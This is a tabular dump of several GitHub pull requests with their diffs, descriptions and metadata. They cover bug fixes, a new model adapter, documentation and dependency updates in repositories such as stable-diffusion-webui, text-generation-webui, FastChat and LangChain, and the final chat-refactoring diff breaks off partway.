title stringlengths 2 169 | diff stringlengths 235 19.5k | body stringlengths 0 30.5k | url stringlengths 48 84 | created_at stringlengths 20 20 | closed_at stringlengths 20 20 | merged_at stringlengths 20 20 | updated_at stringlengths 20 20 | diff_len float64 101 3.99k | repo_name stringclasses 83
values | __index_level_0__ int64 15 52.7k |
|---|---|---|---|---|---|---|---|---|---|---|
handle 0 wheel deltaY | diff --git a/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js b/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
index 64e7a638a4c..b0963f4fe2c 100644
--- a/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
+++ b/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
@@ -793,7 +793,7 @@ onUiLoaded(async() => {
targetElement.addEventListener("wheel", e => {
// change zoom level
- const operation = e.deltaY > 0 ? "-" : "+";
+ const operation = (e.deltaY || -e.wheelDelta) > 0 ? "-" : "+";
changeZoomLevel(operation, e);
// Handle brush size adjustment with ctrl key pressed
| ## Description
I had a strange bug. When I was scrolling on remote PC via VNC remote desktop, I wasn't able to zoom out. I've found it's because deltaX was always 0. If I do it with real mouse - everything is OK
It's not really necessary to fix it in this way, this bug is rare and it's a problem of VNC. But I think nothing will be wrong with this change
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/15268 | 2024-03-15T08:11:39Z | 2024-03-16T15:25:00Z | 2024-03-16T15:25:00Z | 2024-03-17T01:44:35Z | 186 | AUTOMATIC1111/stable-diffusion-webui | 39,859 |
Merge dev branch | diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml
index 2de6d955a3..fee541962d 100644
--- a/.github/workflows/stale.yml
+++ b/.github/workflows/stale.yml
@@ -13,8 +13,8 @@ jobs:
- uses: actions/stale@v5
with:
stale-issue-message: ""
- close-issue-message: "This issue has been closed due to inactivity for 6 weeks. If you believe it is still relevant, please leave a comment below. You can tag a developer in your comment."
- days-before-issue-stale: 42
+ close-issue-message: "This issue has been closed due to inactivity for 2 months. If you believe it is still relevant, please leave a comment below. You can tag a developer in your comment."
+ days-before-issue-stale: 60
days-before-issue-close: 0
stale-issue-label: "stale"
days-before-pr-stale: -1
diff --git a/modules/models.py b/modules/models.py
index 038669f3c8..d8f1a9f815 100644
--- a/modules/models.py
+++ b/modules/models.py
@@ -254,26 +254,17 @@ def llamacpp_loader(model_name):
def llamacpp_HF_loader(model_name):
from modules.llamacpp_hf import LlamacppHF
- for fname in [model_name, "oobabooga_llama-tokenizer", "llama-tokenizer"]:
- path = Path(f'{shared.args.model_dir}/{fname}')
- if all((path / file).exists() for file in ['tokenizer_config.json', 'special_tokens_map.json', 'tokenizer.model']):
- logger.info(f'Using tokenizer from: \"{path}\"')
- break
+ path = Path(f'{shared.args.model_dir}/{model_name}')
+
+ # Check if a HF tokenizer is available for the model
+ if all((path / file).exists() for file in ['tokenizer.model', 'tokenizer_config.json']):
+ logger.info(f'Using tokenizer from: \"{path}\"')
else:
- logger.error("Could not load the model because a tokenizer in transformers format was not found. Please download oobabooga/llama-tokenizer.")
+ logger.error("Could not load the model because a tokenizer in Transformers format was not found.")
return None, None
- if shared.args.no_use_fast:
- logger.info('Loading the tokenizer with use_fast=False.')
-
- tokenizer = AutoTokenizer.from_pretrained(
- path,
- trust_remote_code=shared.args.trust_remote_code,
- use_fast=not shared.args.no_use_fast
- )
-
model = LlamacppHF.from_pretrained(model_name)
- return model, tokenizer
+ return model
def ctransformers_loader(model_name):
diff --git a/modules/ui_model_menu.py b/modules/ui_model_menu.py
index 2367909773..387915b1a1 100644
--- a/modules/ui_model_menu.py
+++ b/modules/ui_model_menu.py
@@ -143,7 +143,7 @@ def create_ui():
shared.gradio['disable_exllamav2'] = gr.Checkbox(label="disable_exllamav2", value=shared.args.disable_exllamav2, info='Disable ExLlamav2 kernel for GPTQ models.')
shared.gradio['gptq_for_llama_info'] = gr.Markdown('Legacy loader for compatibility with older GPUs. ExLlamav2_HF or AutoGPTQ are preferred for GPTQ models when supported.')
shared.gradio['exllamav2_info'] = gr.Markdown("ExLlamav2_HF is recommended over ExLlamav2 for better integration with extensions and more consistent sampling behavior across loaders.")
- shared.gradio['llamacpp_HF_info'] = gr.Markdown('llamacpp_HF loads llama.cpp as a Transformers model. To use it, you need to download a tokenizer.\n\nOption 1 (recommended): place your .gguf in a subfolder of models/ along with these 4 files: special_tokens_map.json, tokenizer_config.json, tokenizer.json, tokenizer.model.\n\nOption 2: download `oobabooga/llama-tokenizer` under "Download model or LoRA". That\'s a default Llama tokenizer that will work for some (but not all) models.')
+ shared.gradio['llamacpp_HF_info'] = gr.Markdown("llamacpp_HF loads llama.cpp as a Transformers model. To use it, download a tokenizer in HF format for your GGUF:\n\n1. Create a folder inside models/\n2. Place your GGUF in the new folder.\n3. Add the original model's tokenizer files there: `tokenizer.model`, `tokenizer_config.json`, `tokenizer.json`, and `special_tokens_map.json`.")
with gr.Column():
with gr.Row():
diff --git a/requirements.txt b/requirements.txt
index 1b09063433..3a16e1ef0d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -50,11 +50,11 @@ https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu1
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.11"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.10"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system != "Darwin" and platform_machine != "x86_64"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system == "Linux" and platform_machine != "x86_64"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/Dao-AILab/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu122torch2.1cxx11abiFALSE-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
diff --git a/requirements_noavx2.txt b/requirements_noavx2.txt
index 386fbe9e62..4d9caf3604 100644
--- a/requirements_noavx2.txt
+++ b/requirements_noavx2.txt
@@ -50,11 +50,11 @@ https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu1
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.11"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.10"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system != "Darwin" and platform_machine != "x86_64"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system == "Linux" and platform_machine != "x86_64"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/Dao-AILab/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu122torch2.1cxx11abiFALSE-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5502 | 2024-02-14T14:32:31Z | 2024-02-14T14:32:58Z | 2024-02-14T14:32:58Z | 2024-02-14T14:32:59Z | 3,257 | oobabooga/text-generation-webui | 26,796 | |
Bugfix to Tool - Mask - add missing | diff --git a/tools/mask.py b/tools/mask.py
index 550cad1858..b276a67424 100644
--- a/tools/mask.py
+++ b/tools/mask.py
@@ -214,7 +214,7 @@ def _input_frames(self, *args):
detected_faces.append(detected_face)
self._update_count += 1
if self._update_type != "output":
- queue.put(ExtractMedia(filename, image, detected_faces=[detected_face]))
+ queue.put(ExtractMedia(filename, image, detected_faces=detected_faces))
if self._update_type != "output":
queue.put("EOF")
| Corrects error from variable mis-spelling. | https://api.github.com/repos/deepfakes/faceswap/pulls/953 | 2019-12-11T03:06:35Z | 2019-12-15T12:49:51Z | 2019-12-15T12:49:51Z | 2019-12-15T12:49:51Z | 144 | deepfakes/faceswap | 18,776 |
Minor improvements | diff --git a/__init__.py b/__init__.py
deleted file mode 100644
index e69de29b..00000000
diff --git a/structural/mvc.py b/structural/mvc.py
index 42137ef7..b7bdfd68 100644
--- a/structural/mvc.py
+++ b/structural/mvc.py
@@ -1,7 +1,9 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
+
class Model(object):
+
def __iter__(self):
raise NotImplementedError
@@ -15,20 +17,21 @@ def item_type(self):
raise NotImplementedError
-
class ProductModel(Model):
class Price(float):
- """A polymorphic way to pass a float with a particular __str__ functionality."""
+ """A polymorphic way to pass a float with a particular
+ __str__ functionality."""
+
def __str__(self):
- first_digits_str = str(round(self,2))
+ first_digits_str = str(round(self, 2))
try:
dot_location = first_digits_str.index('.')
except ValueError:
return (first_digits_str + '.00')
else:
return (first_digits_str +
- '0'*(3 + dot_location - len(first_digits_str)))
+ '0' * (3 + dot_location - len(first_digits_str)))
products = {
'milk': {'price': Price(1.50), 'quantity': 10},
@@ -48,7 +51,9 @@ def get(self, product):
except KeyError as e:
raise KeyError((str(e) + " not in the model's item list."))
+
class View(object):
+
def show_item_list(self, item_type, item_list):
raise NotImplementedError
@@ -60,6 +65,7 @@ def show_item_information(self, item_type, item_name, item_info):
def item_not_found(self, item_type, item_name):
raise NotImplementedError
+
class ConsoleView(View):
def show_item_list(self, item_type, item_list):
@@ -81,7 +87,8 @@ def show_item_information(self, item_type, item_name, item_info):
print(printout)
def item_not_found(self, item_type, item_name):
- print('That %s "%s" does not exist in the records' % (item_type, item_name))
+ print('That %s "%s" does not exist in the records' %
+ (item_type, item_name))
class Controller(object):
diff --git a/tests/test_adapter.py b/tests/test_adapter.py
index da3fdc38..e9f3884f 100644
--- a/tests/test_adapter.py
+++ b/tests/test_adapter.py
@@ -9,8 +9,7 @@
class ClassTest(unittest.TestCase):
- @classmethod
- def setUpClass(self):
+ def setUp(self):
self.dog = Dog()
self.cat = Cat()
self.human = Human()
@@ -43,40 +42,40 @@ def test_car_shall_make_very_loud_noise(self):
class AdapterTest(unittest.TestCase):
- def test_dog_adapter_shall_make_noise(self):
- dog = Dog()
- dog_adapter = Adapter(dog, make_noise=dog.bark)
- noise = dog_adapter.make_noise()
- expected_noise = "woof!"
- self.assertEqual(noise, expected_noise)
+ def test_dog_adapter_shall_make_noise(self):
+ dog = Dog()
+ dog_adapter = Adapter(dog, make_noise=dog.bark)
+ noise = dog_adapter.make_noise()
+ expected_noise = "woof!"
+ self.assertEqual(noise, expected_noise)
- def test_cat_adapter_shall_make_noise(self):
- cat = Cat()
- cat_adapter = Adapter(cat, make_noise=cat.meow)
- noise = cat_adapter.make_noise()
- expected_noise = "meow!"
- self.assertEqual(noise, expected_noise)
+ def test_cat_adapter_shall_make_noise(self):
+ cat = Cat()
+ cat_adapter = Adapter(cat, make_noise=cat.meow)
+ noise = cat_adapter.make_noise()
+ expected_noise = "meow!"
+ self.assertEqual(noise, expected_noise)
- def test_human_adapter_shall_make_noise(self):
- human = Human()
- human_adapter = Adapter(human, make_noise=human.speak)
- noise = human_adapter.make_noise()
- expected_noise = "'hello'"
- self.assertEqual(noise, expected_noise)
+ def test_human_adapter_shall_make_noise(self):
+ human = Human()
+ human_adapter = Adapter(human, make_noise=human.speak)
+ noise = human_adapter.make_noise()
+ expected_noise = "'hello'"
+ self.assertEqual(noise, expected_noise)
- def test_car_adapter_shall_make_loud_noise(self):
- car = Car()
- car_adapter = Adapter(car, make_noise=car.make_noise)
- noise = car_adapter.make_noise(1)
- expected_noise = "vroom!"
- self.assertEqual(noise, expected_noise)
+ def test_car_adapter_shall_make_loud_noise(self):
+ car = Car()
+ car_adapter = Adapter(car, make_noise=car.make_noise)
+ noise = car_adapter.make_noise(1)
+ expected_noise = "vroom!"
+ self.assertEqual(noise, expected_noise)
- def test_car_adapter_shall_make_very_loud_noise(self):
- car = Car()
- car_adapter = Adapter(car, make_noise=car.make_noise)
- noise = car_adapter.make_noise(10)
- expected_noise = "vroom!!!!!!!!!!"
- self.assertEqual(noise, expected_noise)
+ def test_car_adapter_shall_make_very_loud_noise(self):
+ car = Car()
+ car_adapter = Adapter(car, make_noise=car.make_noise)
+ noise = car_adapter.make_noise(10)
+ expected_noise = "vroom!!!!!!!!!!"
+ self.assertEqual(noise, expected_noise)
if __name__ == "__main__":
unittest.main()
| Hi!
With no doubt a pattern collection is a great idea to implement and have in hand. Hope my humble corrections would be useful.
On the next stage I hope to:
- Extend test coverage;
- Sieve existing code through PEP8.
Best regards. | https://api.github.com/repos/faif/python-patterns/pulls/167 | 2017-01-06T11:29:12Z | 2017-01-07T15:50:09Z | 2017-01-07T15:50:09Z | 2017-01-07T15:50:09Z | 1,337 | faif/python-patterns | 33,622 |
Add SOLAR-10.7b Instruct Model | diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index 6a277fa31e..784dbe9ed0 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -1341,6 +1341,19 @@ def get_conv_template(name: str) -> Conversation:
)
)
+# Solar-10.7B Chat Template
+# Reference: https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0/blob/main/tokenizer_config.json
+register_conv_template(
+ Conversation(
+ name="solar",
+ system_message="",
+ roles=("### User", "### Assistant"),
+ sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep="\n\n",
+ stop_str="</s>",
+ )
+)
+
if __name__ == "__main__":
from fastchat.conversation import get_conv_template
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index 78e6c2c8cd..477ebf2246 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -1989,6 +1989,16 @@ def get_default_conv_template(self, model_path: str) -> Conversation:
return get_conv_template("metamath")
+class SolarAdapter(BaseModelAdapter):
+ """The model adapter for upstage/SOLAR-10.7B-Instruct-v1.0"""
+
+ def match(self, model_path: str):
+ return "solar-" in model_path.lower() and "instruct" in model_path.lower()
+
+ def get_default_conv_template(self, model_path: str) -> Conversation:
+ return get_conv_template("solar")
+
+
# Note: the registration order matters.
# The one registered earlier has a higher matching priority.
register_model_adapter(PeftModelAdapter)
@@ -2065,6 +2075,7 @@ def get_default_conv_template(self, model_path: str) -> Conversation:
register_model_adapter(DeepseekCoderAdapter)
register_model_adapter(DeepseekChatAdapter)
register_model_adapter(MetaMathAdapter)
+register_model_adapter(SolarAdapter)
# After all adapters, try the default base adapter.
register_model_adapter(BaseModelAdapter)
diff --git a/fastchat/model/model_registry.py b/fastchat/model/model_registry.py
index 7f392c596d..8bd99b2551 100644
--- a/fastchat/model/model_registry.py
+++ b/fastchat/model/model_registry.py
@@ -441,3 +441,10 @@ def get_model_info(name: str) -> ModelInfo:
"https://huggingface.co/meta-math",
"MetaMath is a finetune of Llama2 on [MetaMathQA](https://huggingface.co/datasets/meta-math/MetaMathQA) that specializes in mathematical reasoning.",
)
+
+register_model_info(
+ ["upstage/SOLAR-10.7B-Instruct-v1.0"],
+ "SOLAR-10.7B-Instruct",
+ "https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0",
+ "A Llama2 fine-tune developed by upstage.ai that incorporates depth up-scaling.",
+)
| ## Why are these changes needed?
Adds the latest model from upstage.ai: https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0 that performs very well on eval leaderboards.
Example output:
<img width="1645" alt="image" src="https://github.com/lm-sys/FastChat/assets/49086305/b784727a-9040-4554-a9a7-6fc2d9f9cc40">
| https://api.github.com/repos/lm-sys/FastChat/pulls/2826 | 2023-12-17T19:45:33Z | 2023-12-17T22:38:16Z | 2023-12-17T22:38:16Z | 2023-12-17T22:38:16Z | 723 | lm-sys/FastChat | 41,665 |
DOCS: core editable dep api refs | diff --git a/docs/api_reference/requirements.txt b/docs/api_reference/requirements.txt
index d2a4e1cd7f017f..59acb6901930fb 100644
--- a/docs/api_reference/requirements.txt
+++ b/docs/api_reference/requirements.txt
@@ -1,5 +1,6 @@
-e libs/langchain
-e libs/experimental
+-e libs/core
pydantic<2
autodoc_pydantic==1.8.0
myst_parser
| https://api.github.com/repos/langchain-ai/langchain/pulls/13747 | 2023-11-22T22:27:58Z | 2023-11-22T22:33:30Z | 2023-11-22T22:33:30Z | 2023-11-24T08:11:37Z | 109 | langchain-ai/langchain | 43,318 | |
add docs for templates | diff --git a/libs/cli/pyproject.toml b/libs/cli/pyproject.toml
index d90c65906f5d9d..31991b73c75421 100644
--- a/libs/cli/pyproject.toml
+++ b/libs/cli/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "langchain-cli"
-version = "0.0.1rc2"
+version = "0.0.3"
description = "CLI for interacting with LangChain"
authors = ["Erick Friis <erick@langchain.dev>"]
readme = "README.md"
diff --git a/templates/CONTRIBUTING.md b/templates/CONTRIBUTING.md
new file mode 100644
index 00000000000000..f7171265f3b11b
--- /dev/null
+++ b/templates/CONTRIBUTING.md
@@ -0,0 +1,18 @@
+# Contributing
+
+To add a new project:
+
+Make sure you have `langchain-cli` installed.
+
+```shell
+pip install -U langchain-cli
+```
+
+Create a new package
+
+```shell
+langchain hub new $PROJECT_NAME
+```
+
+This will set up the skeleton of a package.
+You can then edit the contents of the package as you desire.
diff --git a/templates/INDEX.md b/templates/INDEX.md
index ae70ec85f9941e..2b79bc835aea1f 100644
--- a/templates/INDEX.md
+++ b/templates/INDEX.md
@@ -3,7 +3,11 @@
A list of all template repos
⭐Retrieval Augmented Generation Chatbot: Build a chatbot over your data. Uses OpenAI and Pinecone.
+
⭐Extraction with OpenAI Functions: Do extraction of structured data from unstructured data. Uses OpenAI function calling.
+
⭐Local Retrieval Augmented Generation: Build a chatbot over your data. Uses only local tooling: Ollama, GPT4all, Chroma.
+
⭐OpenAI Functions Agent: Build a chatbot that can take actions. Uses OpenAI function calling and Tavily.
+
⭐XML Agent: Build a chatbot that can take actions. Uses Anthropic and You.com.
diff --git a/templates/README.md b/templates/README.md
index 9404a53812811b..f5974ae1488a0f 100644
--- a/templates/README.md
+++ b/templates/README.md
@@ -1,71 +1,74 @@
-# LangServe Hub
+# LangServe Templates
-Packages that can be easily hosted by LangServe using the `langserve` cli.
+Templates for a fully functioning app that can be hosted by LangServe.
-## Using LangServe Hub
+## Usage
-You can install the `langservehub` CLI and use it as follows:
-```bash
-# install langservehub CLI
-pip install --upgrade langservehub
+To use, first install the LangChain CLI.
-langservehub new my-app
-cd my-app
+```shell
+pip install -U langchain-cli
+```
-poetry install
+Then, install `langserve`:
-# if you have problems with poe, use `poetry run poe ...` instead
+```shell
+pip install "langserve[all]"
+```
-# add the simple-pirate package
-poe add --repo=pingpong-templates/hub simple-pirate
+Next, create a new LangChain project:
-# adding other GitHub repo packages, defaults to repo root
-poe add --repo=hwchase17/chain-of-verification
+```shell
+langchain serve new my-app
+```
-# with a custom api mount point (defaults to `/{package_name}`)
-poe add --repo=pingpong-templates/hub simple-translator --api_path=/my/custom/path/translator
+This will create a new directory called `my-app` with two folders:
-poe list
+- `app`: This is where LangServe code will live
+- `packages`: This is where your chains or agents will live
-poe start
-^C
+To pull in an existing template as a package, you first need to go into your new project:
-# remove packages by their api path:
-poe remove my/custom/path/translator
+```shell
+cd my-app
```
-## Creating New Packages
+And you can the add a template as a project
-You can also create new packages with the `langservehub package new` command
-
-```bash
-# starting from this directory in langserve-hub
-langservehub package new simple-newpackage
+```shell
+langchain serve add $PROJECT_NAME
```
-Now you can edit the chain in `simple-newpackage/simple_newpackage/chain.py` and put up a PR!
-
-Your package will be usable as `poe add --repo=pingpong-templates/hub simple-newpackage` when it's merged in.
+This will pull in the specified template into `packages/$PROJECT_NAME`
-## Data Format
+You then need to install this package so you can use it in the langserve app:
-What makes these packages work?
+```shell
+pip install -e packages/$PROJECT_NAME
+```
-- Poetry
-- pyproject.toml files
+We install it with `-e` so that if we modify the template at all (which we likely will) the changes are updated.
-### Installable Packages
+In order to have LangServe use this project, you then need to modify `app/server.py`.
+Specifically, you should add something like:
-Everything is a Poetry package currently. This allows poetry to manage our dependencies for us :).
+```python
+from fastapi import FastAPI
+from langserve import add_routes
+# This depends on the structure of the package you install
+from my_project import chain
-In addition to normal keys in the `pyproject.toml` file, you'll notice an additional `tool.langserve` key ([link](https://github.com/langchain-ai/langserve-hub/blob/main/simple/pirate/pyproject.toml#L13-L15)).
+app = FastAPI()
-This allows us to identify which module and attribute to import as the chain/runnable for the langserve `add_routes` call.
+add_routes(app, chain)
+```
-### Apps (with installed langserve packages)
+You can then spin up production-ready endpoints, along with a playground, by running:
-Let's say you add the pirate package with `poe add --repo=pingpong-templates/hub simple-pirate`.
+```shell
+python app/server.py
+```
-First this downloads the simple-pirate package to pirate
+## Adding a template
-Then this adds a `poetry` path dependency, which gets picked up from `add_package_routes`.
\ No newline at end of file
+See [here](CONTRIBUTING.md)
| https://api.github.com/repos/langchain-ai/langchain/pulls/12346 | 2023-10-26T15:26:11Z | 2023-10-26T15:28:01Z | 2023-10-26T15:28:01Z | 2023-10-26T15:28:02Z | 1,542 | langchain-ai/langchain | 43,639 | |
Chat simplifications | diff --git a/modules/chat.py b/modules/chat.py
index c4703236f4..6801741abb 100644
--- a/modules/chat.py
+++ b/modules/chat.py
@@ -10,7 +10,6 @@
import yaml
from PIL import Image
-import modules.extensions as extensions_module
import modules.shared as shared
from modules.extensions import apply_extensions
from modules.html_generator import chat_html_wrapper, make_thumbnail
@@ -30,8 +29,8 @@ def generate_chat_prompt(user_input, state, **kwargs):
chat_prompt_size = state['chat_prompt_size']
if shared.soft_prompt:
chat_prompt_size -= shared.soft_prompt_tensor.shape[1]
- max_length = min(get_max_prompt_length(state), chat_prompt_size)
+ max_length = min(get_max_prompt_length(state), chat_prompt_size)
if is_instruct:
prefix1 = f"{state['name1']}\n"
prefix2 = f"{state['name2']}\n"
@@ -57,7 +56,6 @@ def generate_chat_prompt(user_input, state, **kwargs):
min_rows = 2
rows.append(f"{prefix1.strip() if not is_instruct else prefix1}")
elif not _continue:
-
# Adding the user message
if len(user_input) > 0:
this_prefix1 = prefix1.replace('<|round|>', f'{len(shared.history["internal"])}') # for ChatGLM
@@ -68,8 +66,8 @@ def generate_chat_prompt(user_input, state, **kwargs):
while len(rows) > min_rows and len(encode(''.join(rows))[0]) >= max_length:
rows.pop(1)
- prompt = ''.join(rows)
+ prompt = ''.join(rows)
if also_return_rows:
return prompt, rows
else:
@@ -81,6 +79,7 @@ def get_stopping_strings(state):
stopping_strings = [f"\n{state['name1']}", f"\n{state['name2']}"]
else:
stopping_strings = [f"\n{state['name1']}:", f"\n{state['name2']}:"]
+
stopping_strings += ast.literal_eval(f"[{state['custom_stopping_strings']}]")
return stopping_strings
@@ -111,13 +110,13 @@ def extract_message_from_reply(reply, state):
break
else:
continue
+
break
return reply, next_character_found
def chatbot_wrapper(text, state, regenerate=False, _continue=False):
-
if shared.model_name == 'None' or shared.model is None:
print("No model is loaded! Select one in the Model tab.")
yield shared.history['visible']
@@ -125,18 +124,30 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
# Defining some variables
cumulative_reply = ''
- last_reply = [shared.history['internal'][-1][1], shared.history['visible'][-1][1]] if _continue else None
just_started = True
visible_text = None
eos_token = '\n' if state['stop_at_newline'] else None
stopping_strings = get_stopping_strings(state)
- text, visible_text = apply_extensions('input_hijack', text, visible_text)
+ # Preparing the input
+ if not any((regenerate, _continue)):
+ text, visible_text = apply_extensions('input_hijack', text, visible_text)
+ if visible_text is None:
+ visible_text = text
- if visible_text is None:
- visible_text = text
- if not _continue:
- text = apply_extensions("input", text)
+ text = apply_extensions('input', text)
+ # *Is typing...*
+ yield shared.history['visible'] + [[visible_text, shared.processing_message]]
+ else:
+ text, visible_text = shared.history['internal'][-1][0], shared.history['visible'][-1][0]
+ if regenerate:
+ shared.history['visible'].pop()
+ shared.history['internal'].pop()
+ # *Is typing...*
+ yield shared.history['visible'] + [[visible_text, shared.processing_message]]
+ elif _continue:
+ last_reply = [shared.history['internal'][-1][1], shared.history['visible'][-1][1]]
+ yield shared.history['visible'][:-1] + [[visible_text, last_reply[1] + '...']]
# Generating the prompt
kwargs = {'_continue': _continue}
@@ -144,10 +155,6 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
if prompt is None:
prompt = generate_chat_prompt(text, state, **kwargs)
- # Yield *Is typing...*
- if not any((regenerate, _continue)):
- yield shared.history['visible'] + [[visible_text, shared.processing_message]]
-
# Generate
for i in range(state['chat_generation_attempts']):
reply = None
@@ -158,26 +165,26 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
reply, next_character_found = extract_message_from_reply(reply, state)
visible_reply = re.sub("(<USER>|<user>|{{user}})", state['name1'], reply)
visible_reply = apply_extensions("output", visible_reply)
+ if _continue:
+ sep = ' ' if last_reply[0][-1] not in [' ', '\n'] else ''
+ reply = last_reply[0] + sep + reply
+ sep = ' ' if last_reply[1][-1] not in [' ', '\n'] else ''
+ visible_reply = last_reply[1] + sep + visible_reply
# We need this global variable to handle the Stop event,
# otherwise gradio gets confused
if shared.stop_everything:
return shared.history['visible']
+
if just_started:
just_started = False
if not _continue:
shared.history['internal'].append(['', ''])
shared.history['visible'].append(['', ''])
- if _continue:
- sep = list(map(lambda x: ' ' if len(x) > 0 and x[-1] != ' ' else '', last_reply))
- shared.history['internal'][-1] = [text, f'{last_reply[0]}{sep[0]}{reply}']
- shared.history['visible'][-1] = [visible_text, f'{last_reply[1]}{sep[1]}{visible_reply}']
- else:
- shared.history['internal'][-1] = [text, reply]
